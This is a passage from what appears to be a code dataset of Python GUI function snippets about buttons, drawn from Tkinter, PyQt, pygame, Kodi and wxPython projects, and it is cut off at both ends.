GG.genteguada.GenteGuada.getInstance().getDataPath(BUTTON_CANCEL)\n buttonCancel = guiobjects.OcempImageButtonTransparent(imgPath, self.buttonTooltips[\"cancel\"], self.showTooltip, self.removeTooltip)\n buttonCancel.topleft = [890, 30]\n buttonCancel.connect_signal(ocempgui.widgets.Constants.SIG_CLICKED, self.closeConfiguration)\n self.window.add_child(buttonCancel)", "def after_record(self):\n self.record_label.set(\"Re-Record\")\n 
self.button_2['state'] = \"normal\"", "def show_give_buttons(self):\n #\n # Show the give buttons, but only if we have some water\n if self.vessel.value > 0:\n self.log.debug('Showing give buttons with vessel water at {0}'.format(self.water_container.amount))\n for panel in self.health_panels.values():\n panel.show_button()", "def add_another(self):\n message = qtw.QMessageBox(qtw.QMessageBox.information, 'Albums', \"Album added\",\n buttons=qtw.QMessageBox.Ok, parent=self)\n message.setDefaultButton(qtw.QMessageBox.Ok)\n message.setEscapeButton(qtw.QMessageBox.Ok)\n next_button = create_next_button(message)\n message.exec_()\n if message.clickedButton() == next_button:\n self.parent().do_new(keep_sel=self.keep_sel)", "def cb_something_4(self, button): \n print(\"Do Something 4\")", "def add_view_songs_btn(self):\n self.view_songs = QPushButton(\"View Songs\")\n self.view_songs.clicked.connect(self.view_songs_push)\n self.hbtnbox.addWidget(self.view_songs)", "def cb_something_1(self, button):\n print(\"Do Something 1\")", "def enable(self): \n self.feed_button.config(state=\"normal\")\n self.eat_button.config(state=\"normal\") \n for t in range(self.player.game.trait_limit): \n self.add_trait_buttons[t].config(state=\"normal\") \n self.add_population_button.config(state=\"normal\")\n self.add_body_size_button.config(state=\"normal\")", "def addToolBarButtons(self):", "def rules_display(ai_settings, screen, buttons,screen_status, button_status, card_database_filter, user, player2):\n if button_status.rules_display == True:\n button = Button('','', (0,0,0), 0, 0, 1200, 800, alpha = 100)\n button.update()\n button.draw(screen)\n\n button = Button('','', (255,255,255), 200, 35, 800, 730)\n button.update()\n button.draw(screen)\n\n if button_status.rules_page_id == '1':\n screen.blit(pygame.image.load('static/rules_images/001.png'), (200,65))\n\n button = Button('>','', (255,255,255), 640, 37, 20, 20, font_color = (0,0,0))\n button.update()\n button.draw(screen)\n\n elif button_status.rules_page_id == '2':\n screen.blit(pygame.image.load('static/rules_images/002.png'), (200,65))\n\n button = Button('<','', (255,255,255), 540, 37, 20, 20, font_color = (0,0,0))\n button.update()\n button.draw(screen)\n\n button = Button('>','', (255,255,255), 640, 37, 20, 20, font_color = (0,0,0))\n button.update()\n button.draw(screen)\n\n elif button_status.rules_page_id == '3':\n screen.blit(pygame.image.load('static/rules_images/003.png'), (200,65))\n\n button = Button('<','', (255,255,255), 540, 37, 20, 20, font_color = (0,0,0))\n button.update()\n button.draw(screen)\n\n button = Button('>','', (255,255,255), 640, 37, 20, 20, font_color = (0,0,0))\n button.update()\n button.draw(screen)\n\n elif button_status.rules_page_id == '4':\n screen.blit(pygame.image.load('static/rules_images/004.png'), (200,65))\n\n button = Button('<','', (255,255,255), 540, 37, 20, 20, font_color = (0,0,0))\n button.update()\n button.draw(screen)\n\n button = Button('Page: '+button_status.rules_page_id,'', (255,255,255), 570, 35, 60, 30, font_color = (0,0,0))\n button.update()\n button.draw(screen)\n\n button = Button('X','', (250,100,100), 975, 35, 25, 25, font_size = 16)\n button.update()\n button.draw(screen)", "def update(self):\n for (x, y) in self.board.fields:\n text = self.board.fields[x, y]\n self.buttons[x, y]['text'] = text\n self.buttons[x, y]['disabledforeground'] = 'black'\n if text == self.board.empty:\n self.buttons[x, y]['state'] = 'normal'\n else:\n self.buttons[x, y]['state'] = 'disabled'\n winning = 
self.board.won()\n if winning:\n for x, y in winning:\n self.buttons[x, y]['disabledforeground'] = 'red'\n for x, y in self.buttons:\n self.buttons[x, y]['state'] = 'disabled'\n for (x, y) in self.board.fields:\n self.buttons[x, y].update()", "def btn_follow_clicked(self, widget, data=None):\n print \"follow clicked\"\n #Going to put random stuff here.", "def __add_mode_button(self):\n btn_text = self.__toggle_button_text_dict.get(\n self.__ui_mode, \"Unknown Mode Set\")\n btn_text = \"<span style='font-size:20px;'>\" + btn_text + \"</span>\"\n\n btn_toggle = button(bind=self.__toggle_mode, text=btn_text)\n self.__ui_controls.btn_toggle = btn_toggle\n self.scene.append_to_caption('\\n')", "def buttonbox(self):\n if(self.box is not None):\n self.box.destroy()\n\n self.box = Frame(self)\n\n ok_btn = Button(self.box, text=\"Next Player\", width=10,\n command=self.next_cmd, default=ACTIVE)\n ok_btn.pack(side=LEFT, padx=5, pady=5)\n\n finish_btn = Button(self.box, text=\"Ready\",\n state=DISABLED, width=10, command=self.finish_command, default=ACTIVE)\n # ensures a minimum of 2 players\n if self.num_players >= self.min_players:\n finish_btn.config(state=\"normal\")\n finish_btn.pack(side=LEFT, padx=5, pady=5)\n\n cancel_btn = Button(self.box, text=\"Cancel\",\n width=10, command=self.cancel)\n cancel_btn.pack(side=LEFT, padx=5, pady=5)\n\n self.bind(\"<Escape>\", self.cancel)\n\n self.box.pack()", "def set_navigation(self):\n self.close_button.controlUp(self.k1plus_button)\n self.k1plus_button.controlDown(self.k1pro_button)\n self.k1pro_button.controlDown(self.close_button)\n self.k2pro_button.controlDown(self.k1pro_button)\n self.k3pro_button.controlDown(self.k1pro_button)\n self.k1pro_button.controlUp(self.k2pro_button)\n self.k1plus_button.controlRight(self.k2pro_button)\n self.k2pro_button.controlRight(self.k3pro_button)\n self.k3pro_button.controlLeft(self.k2pro_button)\n self.k3pro_button.controlRight(self.k1pro_button)\n self.k2pro_button.controlLeft(self.k1plus_button)\n\t # Set initial focus.\n self.setFocus(self.close_button)", "def add_button_and_label(self):\n\n font_of_label = QFont()\n font_of_label.setFamily(\"Times\")\n font_of_label.setPixelSize(35)\n\n font_of_button = QFont()\n font_of_button.setFamily(\"Times\")\n font_of_button.setPixelSize(55)\n\n # //-label\n self.ECG.setFont(font_of_label)\n self.SpO2.setFont(font_of_label)\n self.PulseWave.setFont(font_of_label)\n self.Respiration.setFont(font_of_label)\n\n # //-button\n self.save.setFixedSize(240, 120)\n self.save.setFont(font_of_button)\n self.clear.setFixedSize(240, 120)\n self.clear.setFont(font_of_button)\n self.receive.setFixedSize(240, 120)\n self.receive.setFont(font_of_button)\n self.exit.setFixedSize(240, 120)\n self.exit.setFont(font_of_button)\n\n self.ECG.setText(\"心电\")\n self.SpO2.setText(\"血氧\")\n self.PulseWave.setText(\"脉搏\")\n self.Respiration.setText(\"呼吸\")\n self.save.setText(\"保存\")\n self.clear.setText(\"清除\")\n self.receive.setText(\"接收\")\n self.exit.setText(\"返回\")\n\n self.save.clicked.connect(self.slot_save)\n self.clear.clicked.connect(self.slot_clear)\n self.receive.clicked.connect(self.slot_receive)\n self.exit.clicked.connect(self.close_win)", "def display(self) -> None:\n # ask info to display to controller\n self.list_matches = ct.Controls.get_current_matches()\n for elem in self.list_matches: # setup the data to be displayed\n p1 = str(elem.player1)\n p2 = str(elem.player2)\n match = p1 + ' vs ' + p2\n self.lignes.append({'match_instance': elem, 'label': match, 'choice': ['match nul', 
p1, p2],\n 'result': None})\n for index, elem in enumerate(self.lignes): # display the data\n self.widgets.append(self.my_simple_line(self.master, elem['label'], index + 1, 0, 1, 1, 10, 10))\n elem['result'], menu_option = self.my_option_menu(self.master, elem['choice'], index + 1, 1, 1, 1, 10, 10)\n self.widgets.append(menu_option)\n # display the button to go through next step of tournament\n self.widgets.append(self.my_button(self.master, 'Clôturer ce tour', 0, len(self.lignes) + 1, self.save_scores))", "def set_navigation(self):\n self.close_button.controlUp(self.wplnb1_button)\n self.wplnb1_button.controlRight(self.wplnb2_button)\n self.wplnb2_button.controlRight(self.wplnboth_button)\n self.wplnb1_button.controlDown(self.close_button)\n self.wplnb2_button.controlDown(self.close_button)\n self.wplnboth_button.controlDown(self.close_button)\n self.wplnb1_button.controlLeft(self.wplnboth_button) \n self.wplnb2_button.controlLeft(self.wplnb1_button) \n self.wplnboth_button.controlLeft(self.wplnb2_button)\n self.wplnboth_button.controlRight(self.wplnb1_button)\n\t # Set initial focus.\n self.setFocus(self.close_button)", "def on_step_up_rcr_btn_clicked(self):\n self.status = 'up'\n status_txt = \"step \" + self.status\n self.set_status_txt(status_txt)\n self.control1.device.cmd_move(self.status)\n # self.set_ab_height()", "def _on_gui_event(self): \n pos = self.last_gui_position\n button = self.get_object_id(pos)\n next_state = self.sm.state \n \n if button == self.buttons.BARCODE:\n self.barcode = \"\"\n self.set_active_entry(self.buttons.BARCODE)\n self._request_redraw()\n next_state = self.states.BARCODE\n\n if button == self.buttons.DESCRIPTION:\n self.description = \"\"\n self.set_active_entry(self.buttons.DESCRIPTION)\n self._request_redraw()\n next_state = self.states.DESCRIPTION\n\n if button == self.buttons.PRICE:\n self.price = 0\n self.set_active_entry(self.buttons.PRICE)\n self._request_redraw()\n next_state = self.states.PRICE\n\n if button == self.buttons.DONE:\n if self.data_ready():\n self.add_product()\n next_state = self.states.ADDING\n else:\n self.set_banner_with_timeout(\"One or more entries not valid!\", 4, Colours.WARN, self._banner_timeout)\n self._request_redraw()\n next_state = self.states.WARNING\n\n if button == self.buttons.CANCEL:\n self._exit()\n next_state = self.states.BARCODE\n\n #No GUI object hit:\n return next_state", "def lobby_screen_pick_deck_warning_button_display(ai_settings, screen, buttons,screen_status, button_status, card_database_filter, user, action, player2):\n if button_status.lobby_screen_end_screen_warning_button_display == 'deck less than 40 cards':\n button = Button('You need at least 40','' ,(122,33,38),1050, 580, 150, 30,font_size = 13)\n button.update()\n button.draw(screen)\n\n button = Button('cards in your deck!','' ,(122,33,38),1050, 610, 150, 30,font_size = 13)\n button.update()\n button.draw(screen)\n\n button = Button('','' ,(122,33,38),1050, 640, 150, 40,font_size = 18)\n button.update()\n button.draw(screen)\n\n button = Button('ok','' ,(22,143,78),1100, 642, 40, 30,font_size = 16)\n button.update()\n button.draw(screen)\n\n elif button_status.lobby_screen_end_screen_warning_button_display == 'no deck':\n button = Button('Please pick a deck','' ,(122,33,38),1050, 580, 150, 30,font_size = 13)\n button.update()\n button.draw(screen)\n\n button = Button('or build a new one!','' ,(122,33,38),1050, 610, 150, 30,font_size = 13)\n button.update()\n button.draw(screen)\n\n button = Button('','' ,(122,33,38),1050, 640, 150, 
40,font_size = 18)\n button.update()\n button.draw(screen)\n\n button = Button('ok','' ,(22,143,78),1100, 642, 40, 30,font_size = 16)\n button.update()\n button.draw(screen)", "def build_deck_screen_stable_button_display(screen, buttons,screen_status,button_status):\n # button1 = Button('Back','build_deck_screen', (0,0,0),0, 0, 50, 50)\n # button1.update()\n # button1.draw(screen)\n button2 = Button('Save','build_deck_screen', (250,250,250),1150, 0, 50, 50, font_color = (0,0,0), alpha = 150)\n button2.update()\n button2.draw(screen)\n button3 = Button('Build your deck by picking 40 cards below: ', 'build_deck_screen', (250,250,250),300, 0, 600, 50, font_color = (0,0,0), alpha = 150)\n button3.update()\n button3.draw(screen)\n if button_status.build_deck_screen_stable_button_backend:\n buttons.extend((button2, button3))\n button_status.build_deck_screen_stable_button_backend = False", "def click(self):\r\n pass", "def add_button_clicked(self, obj):\n note = Note()\n if self.notetype :\n note.set_type(self.notetype)\n try:\n from .. import EditNote\n EditNote(self.dbstate, self.uistate, self.track, \n note, self.add_callback,\n self.callertitle, extratype = [self.notetype])\n except WindowActiveError:\n pass", "def OnButton(self, event):\r\n \r\n button = event.GetInt()\r\n\r\n if button == AUI_BUTTON_LEFT or button == AUI_BUTTON_RIGHT:\r\n if button == AUI_BUTTON_LEFT:\r\n if self.GetTabOffset() > 0:\r\n \r\n self.SetTabOffset(self.GetTabOffset()-1)\r\n self.Refresh()\r\n self.Update()\r\n else:\r\n self.SetTabOffset(self.GetTabOffset()+1)\r\n self.Refresh()\r\n self.Update()\r\n \r\n elif button == AUI_BUTTON_WINDOWLIST:\r\n idx = self.GetArtProvider().ShowDropDown(self, self._pages, self.GetActivePage())\r\n \r\n if idx != -1:\r\n \r\n e = AuiNotebookEvent(wxEVT_COMMAND_AUINOTEBOOK_PAGE_CHANGING, self.GetId())\r\n e.SetSelection(idx)\r\n e.SetOldSelection(self.GetActivePage())\r\n e.SetEventObject(self)\r\n self.GetEventHandler().ProcessEvent(e)\r\n \r\n else:\r\n event.Skip()", "def __place_main_buttons(self):\n\n #load the images and the locations\n base_x = self.__main_buttons_coords[\"x\"]\n base_y = self.__main_buttons_coords[\"y\"]\n self.__exit_btn_img = ImageTk.PhotoImage(PIL.Image.open(r\"Images server\\exit btn.png\"))\n self.__kick_all_passengers_img = ImageTk.PhotoImage(PIL.Image.open(r\"Images server\\kick people btn.png\"))\n self.__kick_all_buses_btn_img = ImageTk.PhotoImage(PIL.Image.open(r\"Images server\\kick buses btn.png\"))\n #create the button objects and set their settings to match the desgin\n self.__kick_buses_btn = Button(self.__main_window, image=self.__kick_all_buses_btn_img, command=lambda: self.__bus_controller.kick_all_buses(reason=\"kicked all buses by the console\"), borderwidth=0, background = \"#000000\", activebackground = \"#083417\")\n self.__kick__all_passengers_btn = Button(self.__main_window, image=self.__kick_all_passengers_img,command = lambda:self.__telegram_controller.kick_all_passengers(\"kicked all users from console\"), borderwidth=0, background = \"#000000\", activebackground = \"#083417\")\n self.__exit_button = Button(self.__main_window, command=self.__stop, image=self.__exit_btn_img, borderwidth=0, background = \"#000000\", activebackground = \"#B91D1D\")\n #place the buttons on the screen\n self.__kick__all_passengers_btn.place(x=base_x, y=base_y)\n self.__exit_button.place(x=base_x+210, y=base_y+133)\n self.__kick_buses_btn.place(x=base_x + 210, y=base_y)", "def on_pushButton_10_clicked(self):\n # TODO: not implemented yet\n raise 
NotImplementedError", "def add_button(self, first_run = False):\n if cf.music_on is True:\n m = 'Off'\n if first_run is False:\n cf.start_music('spoopy.wav')\n elif cf.music_on is False:\n m = 'On'\n if first_run is False:\n cf.stop_music()\n x = PygameUI.Button('Turn Music '+m,self.click_music)\n x.frame = pygame.Rect(0, 100, 270, 30)\n self.scene.add_child(x)\n w = x.frame.w\n xoff = cf.surface.get_rect().centerx-w/2\n x.frame = pygame.Rect(xoff, 100, 270, 30)\n self.toggle_button_el = x", "def add_play_btn(self):\n self.play_btn = QPushButton(\"Play Playlist\")\n self.play_btn.clicked.connect(self.play_btn_push)\n self.hbtnbox.addWidget(self.play_btn)", "def run_button(self):\r\n self.step = False # Clear step command\r\n self.is_pause = False\r\n self.run_command()", "def addButtons(self):\r\n profbox()\r\n if self.buttonsGroupBox != None:\r\n self.layout.removeWidget(self.buttonsGroupBox)\r\n self.buttonsGroupBox.deleteLater()\r\n self.buttonsGroupBox = None\r\n self.buttonsGroupBox = qt.QGroupBox()\r\n self.buttonsGroupBox.setTitle('Manage Needles')\r\n self.layout.addRow(self.buttonsGroupBox)\r\n self.buttonsGroupBoxLayout = qt.QFormLayout(self.buttonsGroupBox)\r\n\r\n modelNodes = slicer.util.getNodes('vtkMRMLModelNode*')\r\n for modelNode in modelNodes.values():\r\n if modelNode.GetAttribute(\"segmented\") == \"1\":\r\n i = int(modelNode.GetAttribute(\"nth\"))\r\n buttonDisplay = qt.QPushButton(\"Hide \" + self.option[i])\r\n buttonBentDisplay = qt.QPushButton(\"Hide Bent \" + self.option[i])\r\n buttonDisplay.checkable = True\r\n buttonBentDisplay.checkable = True\r\n\r\n if modelNode.GetDisplayVisibility() == 0:\r\n buttonDisplay.setChecked(1)\r\n\r\n buttonDisplay.connect(\"clicked()\", lambda who=i: self.displayNeedle(who))\r\n buttonBentDisplay.connect(\"clicked()\", lambda who=i: self.displayBentNeedle(who))\r\n buttonReformat = qt.QPushButton(\"Reformat \" + self.option[i])\r\n buttonReformat.connect(\"clicked()\", lambda who=i: self.reformatSagittalView4Needle(who))\r\n widgets = qt.QWidget()\r\n hlay = qt.QHBoxLayout(widgets)\r\n hlay.addWidget(buttonDisplay)\r\n hlay.addWidget(buttonBentDisplay)\r\n hlay.addWidget(buttonReformat)\r\n self.buttonsGroupBoxLayout.addRow(widgets)", "def create_widgets(self):\n self.Hi = Button(self, text= \"hi\", fg=\"red\", command=self.say_hi)\n self.Hi.pack({\"side\": \"left\"})\n # quit with out () means return not call\n self.Quit = Button(self, text=\"Goodbye\", fg=\"blue\", command=self.quit)\n self.Quit.pack({\"side\": \"left\"})", "def button_box(self):\r\n\r\n below_hz_frame = tkinter.Frame(self)\r\n ok_button = ttk.Button(below_hz_frame, text=\"OK\",\r\n width=10, command=self.ok,\r\n default=tkinter.ACTIVE)\r\n ok_button.grid(row=0, column=0, padx=30, pady=10)\r\n cancel_button = ttk.Button(below_hz_frame, text=\"Cancel\", width=10,\r\n command=self.cancel)\r\n cancel_button.grid(row=0, column=1, padx=30, pady=10)\r\n\r\n # bind 'ok' method to the 'enter' button of the keyboard\r\n self.bind(\"<Return>\", self.ok)\r\n\r\n # bind 'cancel' method to the 'esc' button of the keyboard\r\n self.bind(\"<Escape>\", self.cancel)\r\n below_hz_frame.pack(fill=tkinter.X)", "def addButtons(self):\n profbox()\n if self.buttonsGroupBox != None:\n self.layout.removeWidget(self.buttonsGroupBox)\n self.buttonsGroupBox.deleteLater()\n self.buttonsGroupBox = None\n self.buttonsGroupBox = qt.QGroupBox()\n self.buttonsGroupBox.setTitle( 'Manage Needles' )\n self.layout.addRow( self.buttonsGroupBox )\n self.buttonsGroupBoxLayout = qt.QFormLayout( 
self.buttonsGroupBox )\n \n modelNodes = slicer.util.getNodes('vtkMRMLModelNode*')\n for modelNode in modelNodes.values():\n if modelNode.GetAttribute(\"segmented\") == \"1\":\n i = int(modelNode.GetAttribute(\"nth\"))\n buttonDisplay = qt.QPushButton(\"Hide \"+self.option[i])\n buttonBentDisplay = qt.QPushButton(\"Hide Bent \"+self.option[i])\n buttonDisplay.checkable = True\n buttonBentDisplay.checkable = True\n\n if modelNode.GetDisplayVisibility() ==0:\n buttonDisplay.setChecked(1)\n\n buttonDisplay.connect(\"clicked()\", lambda who=i: self.displayNeedle(who))\n buttonBentDisplay.connect(\"clicked()\", lambda who=i: self.displayBentNeedle(who))\n buttonReformat = qt.QPushButton(\"Reformat \"+self.option[i])\n buttonReformat.connect(\"clicked()\", lambda who=i: self.reformatNeedle(who))\n widgets = qt.QWidget()\n hlay = qt.QHBoxLayout(widgets)\n hlay.addWidget(buttonDisplay)\n hlay.addWidget(buttonBentDisplay)\n hlay.addWidget(buttonReformat)\n self.buttonsGroupBoxLayout.addRow(widgets)", "def execPushButton(self):\n\t\t# verbose.detail(\"%s %s\" %(self.sender().objectName(), self.sender().property('exec')))\n\t\tprint(\"%s %s\" %(self.sender().objectName(), self.sender().property('exec')))", "def on_continue_button(self, event):\n text = _(u\"Continue button pressed.\")\n if self.state == 0:\n self.canvas_2d.render(text)\n else:\n self.canvas_3d.render()\n self.continue_command()", "def button(msg, font_size, x, y, w, h, color, action):\r\n mouse = pygame.mouse.get_pos() # Grabbing cursor position\r\n click = pygame.mouse.get_pressed() # Mouse button status\r\n \r\n # Check if cursor is on the button\r\n if x + w > mouse[0] > x and y + h > mouse[1] > y:\r\n # Draw the button\r\n pygame.draw.rect(display, color, (x, y, w, h)) \r\n \r\n # Check if we have clicked on the button\r\n if click[0] == 1 and action is not None:\r\n \r\n # Run singleplayer mode\r\n if action == \"Play S\": \r\n mode = \"singleplayer\" # set mode\r\n ctf.ctf_game(mode, selected_map)\r\n \r\n # Run multiplayer mode\r\n if action == \"Play M\":\r\n mode = \"multiplayer\" # set mode\r\n ctf.ctf_game(mode, selected_map)\r\n \r\n # Quit\r\n if action == \"Quit\":\r\n pygame.quit()\r\n quit()\r\n \r\n # Demo\r\n if action == \"Demo\":\r\n mode = \"demo\"\r\n ctf.ctf_game(mode, selected_map)\r\n \r\n # set display\r\n pygame.display.set_mode((display_width, display_height), pygame.RESIZABLE)\r\n \r\n # Displaying text on the button\r\n font = pygame.font.Font('freesansbold.ttf', font_size)\r\n text_surf, text_rect = text_objects(msg, font)\r\n text_rect.center = ((x+(w/2)), (y+(h/2)))\r\n display.blit(text_surf, text_rect)", "def help_menu_about_activate(self, widget, data=None):\n print \"cmon\"\n button1 = gtk.Button(\"Press Me!\")\n self.fixed1.put(button1, 0, 0)\n button1.window.raise_()\n button1.show()\n button2 = gtk.Button(\"Prease Press Me!\")\n self.fixed1.put(button2, 380, 380)\n button2.show()\n button2.window.raise_()", "def add_next_ui_button(self, label: str, function: Union[Callable, str]):\n\n def on_click(_: ControlEvent):\n self._callbacks.queue_fn_or_kw(function, self._get_results())\n\n button = ElevatedButton(label, on_click=on_click)\n self._client.add_element(button)\n self._client.add_to_disablelist(button)", "def draw_buttons(screen):\r\n for button in start_buttons: # goes through every start button\r\n if button.active:\r\n button.draw(screen) # shows the button\r\n for button in end_buttons: # goes through every start button\r\n if button.active:\r\n button.draw(screen) # shows the 
button\r\n for onewriting in button_writings_start: # goes through every start writing\r\n if onewriting.active:\r\n onewriting.draw(screen, True) # shows the writing\r\n for onewriting in button_writings_end: # goes through every in game writing\r\n if onewriting.active:\r\n onewriting.draw(screen, True) # shows the writing\r", "def set_controls(self):\n # Image control\n image = pyxbmct.Image(addonfolder+artsfolder+'/osc.png')\n self.placeControl(image, 0, 0, rowspan=8, columnspan=16)\n\n\t\t# Label information\n image = pyxbmct.Image(addonfolder+artsfolder+'/users.png')\n self.placeControl(image, 8, 1, rowspan=1, columnspan=14)\n\t\t\n\t\t# Username input\n image = pyxbmct.Image(addonfolder+artsfolder+'/username.png')\n self.placeControl(image, 10, 1, rowspan=1, columnspan=3)\n self.username_input = pyxbmct.Edit('')\n self.placeControl(self.username_input, 10, 4, rowspan=1, columnspan=4)\n self.username_input.setText('oscam')\n\t\t\n\t\t# Password input\n image = pyxbmct.Image(addonfolder+artsfolder+'/password.png')\n self.placeControl(image, 11, 1, rowspan=1, columnspan=3)\n self.password_input = pyxbmct.Edit('', isPassword=True)\n self.placeControl(self.password_input, 11, 4, rowspan=1, columnspan=4)\n self.password_input.setText('oscam')\n\t\t\n\t\t# Port input\n image = pyxbmct.Image(addonfolder+artsfolder+'/port.png')\n self.placeControl(image, 12, 1, rowspan=1, columnspan=3)\n self.port_input = pyxbmct.Edit('')\n self.placeControl(self.port_input, 12, 4, rowspan=1, columnspan=4)\n self.port_input.setText('8888')\n\t\t\n\t\t# Next button\n self.next_button = pyxbmct.Button('Next')\n self.placeControl(self.next_button, 13, 14, rowspan=1, columnspan=1)\n # Connect close button\n self.connect(self.next_button, lambda: self.page())\n\t\t\n\t\t# Close button\n self.close_button = pyxbmct.Button('Exit')\n self.placeControl(self.close_button, 13, 15, rowspan=1, columnspan=1)\n self.connect(self.close_button, lambda: self.closepage())", "def configure_widgets(self):\r\n\r\n # 'command' - callback function executed when button is pressed\r\n # since we can't pass it a function with arguments, we use the partial \r\n # function from the functools module\r\n self.btn_tl['command'] = partial(self.play, \"x\", (0,0))\r\n self.btn_tm['command'] = partial(self.play, \"x\", (0,1))\r\n self.btn_tr['command'] = partial(self.play, \"x\", (0,2))\r\n self.btn_ml['command'] = partial(self.play, \"x\", (1,0))\r\n self.btn_mm['command'] = partial(self.play, \"x\", (1,1))\r\n self.btn_mr['command'] = partial(self.play, \"x\", (1,2))\r\n self.btn_bl['command'] = partial(self.play, \"x\", (2,0))\r\n self.btn_bm['command'] = partial(self.play, \"x\", (2,1))\r\n self.btn_br['command'] = partial(self.play, \"x\", (2,2))\r\n\r\n self.btn_reset['text'] = \"Reset\"\r\n self.btn_reset['command'] = self.reset", "def set_navigation(self):\n self.close_button.controlUp(self.nos_button)\n self.nos_button.controlDown(self.madeira_button)\n self.nos_button.controlRight(self.nowo_button)\n self.nowo_button.controlDown(self.madeira_button)\n self.nowo_button.controlLeft(self.nos_button)\n self.madeira_button.controlUp(self.nos_button)\n self.madeira_button.controlDown(self.close_button)\n\t # Set initial focus.\n self.setFocus(self.close_button)", "def set_controls(self):\n # Image control\n image = pyxbmct.Image(addonfolder+artsfolder+'/tvh.png')\n self.placeControl(image, 0, 0, rowspan=8, columnspan=17)\n\n\t\t# Wetek Button\n self.wetek_button = pyxbmct.RadioButton('')\n self.placeControl(self.wetek_button, 9, 1, 
rowspan=3, columnspan=3)\n self.connect(self.wetek_button, self.wetek_button_update)\n if tools.return_data('TVHWIZARD', 'STRING', 'wetek', 2) == 1:\n self.wetek_button.setSelected(True)\n else:\n self.wetek_button.setSelected(False)\n wetek = pyxbmct.Image(addonfolder+artsfolder+'/weteksmall.png')\n self.placeControl(wetek, 9, 1, rowspan=3, columnspan=3)\n\n\t\t# K Button\n self.k_button = pyxbmct.RadioButton('')\n self.placeControl(self.k_button, 9, 5, rowspan=3, columnspan=3)\n self.connect(self.k_button, self.k_button_update)\n if tools.return_data('TVHWIZARD', 'STRING', 'k', 2) == 1:\n self.k_button.setSelected(True)\n else:\n self.k_button.setSelected(False)\n k = pyxbmct.Image(addonfolder+artsfolder+'/ksmall.png')\n self.placeControl(k, 9, 5, rowspan=3, columnspan=3)\n\n\t\t# Khadas Button\n self.khadas_button = pyxbmct.RadioButton('')\n self.placeControl(self.khadas_button, 9, 9, rowspan=3, columnspan=3)\n self.connect(self.khadas_button, self.khadas_button_update)\n if tools.return_data('TVHWIZARD', 'STRING', 'khadas', 2) == 1:\n self.khadas_button.setSelected(True)\n else:\n self.khadas_button.setSelected(False)\n khadas = pyxbmct.Image(addonfolder+artsfolder+'/khadasmall.png')\n self.placeControl(khadas, 9, 9, rowspan=3, columnspan=3)\n\n\t\t# Generic Button\n self.generic_button = pyxbmct.RadioButton('')\n self.placeControl(self.generic_button, 9, 13, rowspan=3, columnspan=3)\n self.connect(self.generic_button, self.generic_button_update)\n if tools.return_data('TVHWIZARD', 'STRING', 'generic', 2) == 1:\n self.generic_button.setSelected(True)\n else:\n self.generic_button.setSelected(False)\n generic = pyxbmct.Image(addonfolder+artsfolder+'/genericsmall.png')\n self.placeControl(generic, 9, 13, rowspan=3, columnspan=3)\n\t\t\n\t\t# Close button\n self.close_button = pyxbmct.Button('Exit')\n self.placeControl(self.close_button, 13, 16, rowspan=1, columnspan=1)\n self.connect(self.close_button, lambda: self.closepage())", "def display(self, color = (190,205,205), add = False):\r\n\t\tpass", "def build_deck_screen_my_deck_button_display(screen,buttons, screen_status, button_status, card_database_filter, user):\n local_store_list = build_deck_screen_my_deck_card_list_refine(user)\n #character number display\n if user.character_card == '':\n button1 = Button('Character: 0/1','' ,(250,250,250),50, 560, 150, 30, font_color = (255,60,60), alpha = 150)\n else:\n button1 = Button('Character: 1/1','' ,(250,250,250),50, 560, 150, 30, font_color = (0,0,0), alpha = 150)\n button1.update()\n button1.draw(screen)\n #card number display\n if len(user.deck_list) >= 40:\n button2 = Button('Total: ' + str(len(user.deck_list)) + '/40','' ,(250,250,250),620, 560, 100, 30,font_color = (0,0,0), alpha = 150)\n else:\n button2 = Button('Total: ' + str(len(user.deck_list)) + '/40','' ,(250,250,250),620, 560, 100, 30, font_color = (255,60,60), alpha = 150)\n button2.update()\n button2.draw(screen)\n\n # Page forward button\n button3 = Button('>','', (250,250,250),1110,650, 30, 30, font_color = (0,0,0), alpha = 150)\n # Edge cases when len() = 14,28,42 ...\n if len(local_store_list) % 6 == 0 and len(local_store_list) != 0:\n if screen_status.build_deck_screen_my_deck_page_id != ((len(local_store_list))//6): # Make sure on the last page no foreward button shows up\n button3.update()\n button3.draw(screen)\n # Normal cases\n else:\n if screen_status.build_deck_screen_my_deck_page_id != ((len(local_store_list))//6 + 1): # Make sure on the last page no foreward button shows up\n button3.update()\n 
button3.draw(screen)\n # Page backward button\n button4 = Button('<','', (250,250,250),210,650, 30, 30, font_color = (0,0,0), alpha = 150)\n if screen_status.build_deck_screen_my_deck_page_id != 1: # Make sure on the first page no backward button shows up\n button4.update()\n button4.draw(screen)\n\n if button_status.build_deck_screen_my_deck_button_backend:\n buttons.extend((button3,button4))\n button_status.build_deck_screen_my_deck_button_backend = False", "def create_buttons(grid_display, text_color, outline_color, screen_width, screen_height):\n\n all_button = []\n\n # create font used inside the buttons\n button_font = pygame.font.SysFont(\"monospace\", screen_width / 20)\n\n # help button\n temp_font = button_font.render(\"test\", 1, text_color)\n center_text = temp_font.get_rect()\n center_text.centery = screen_height * .75\n center_text.width = screen_width * .5\n center_text.centerx = screen_width * .5\n help_button = Button(center_text.copy(), \"Help\", text_color, outline_color, button_font)\n all_button.append(help_button)\n\n # 1 player button\n center_text.left = screen_width * .27\n center_text.width = screen_width * .12\n center_text.top = screen_height * .5\n center_text.height = screen_height * .1\n one_button = Button(center_text.copy(), \"1\", text_color, outline_color, button_font)\n all_button.append(one_button)\n\n # 2 player button\n center_text.left = screen_width * .44\n two_button = Button(center_text.copy(), \"2\", text_color, outline_color, button_font)\n all_button.append(two_button)\n\n # 3 player button\n center_text.left = screen_width * .6\n three_button = Button(center_text.copy(), \"3\", text_color, outline_color, button_font)\n all_button.append(three_button)\n\n # back button\n center_text.width = screen_width * .25\n center_text.centerx = grid_display.get_rect().centerx\n center_text.centery = screen_height * .8\n back_button = Button(center_text.copy(), \"Back\", text_color, outline_color, button_font)\n all_button.append(back_button)\n\n # continue button\n center_text.centery = screen_height * .62\n center_text.centerx = screen_width * .5\n pause_button = Button(center_text.copy(), \"Continue\", text_color, outline_color, button_font)\n all_button.append(pause_button)\n\n # reset button\n center_text.centery = screen_height * .75\n center_text.centerx = screen_width * .5\n reset_button = Button(center_text.copy(), \"Reset\", text_color, outline_color, button_font)\n all_button.append(reset_button)\n\n # return to menu button\n center_text.centery = screen_height * .88\n center_text.centerx = screen_width * .5\n back_to_menu_button = Button(center_text.copy(), \"Menu\", text_color, outline_color, button_font)\n all_button.append(back_to_menu_button)\n\n return all_button", "def HandButton(self, event):\n pass", "def update_navigation_buttons(self):\n test = self.artist_list.currentIndex() # .row()\n 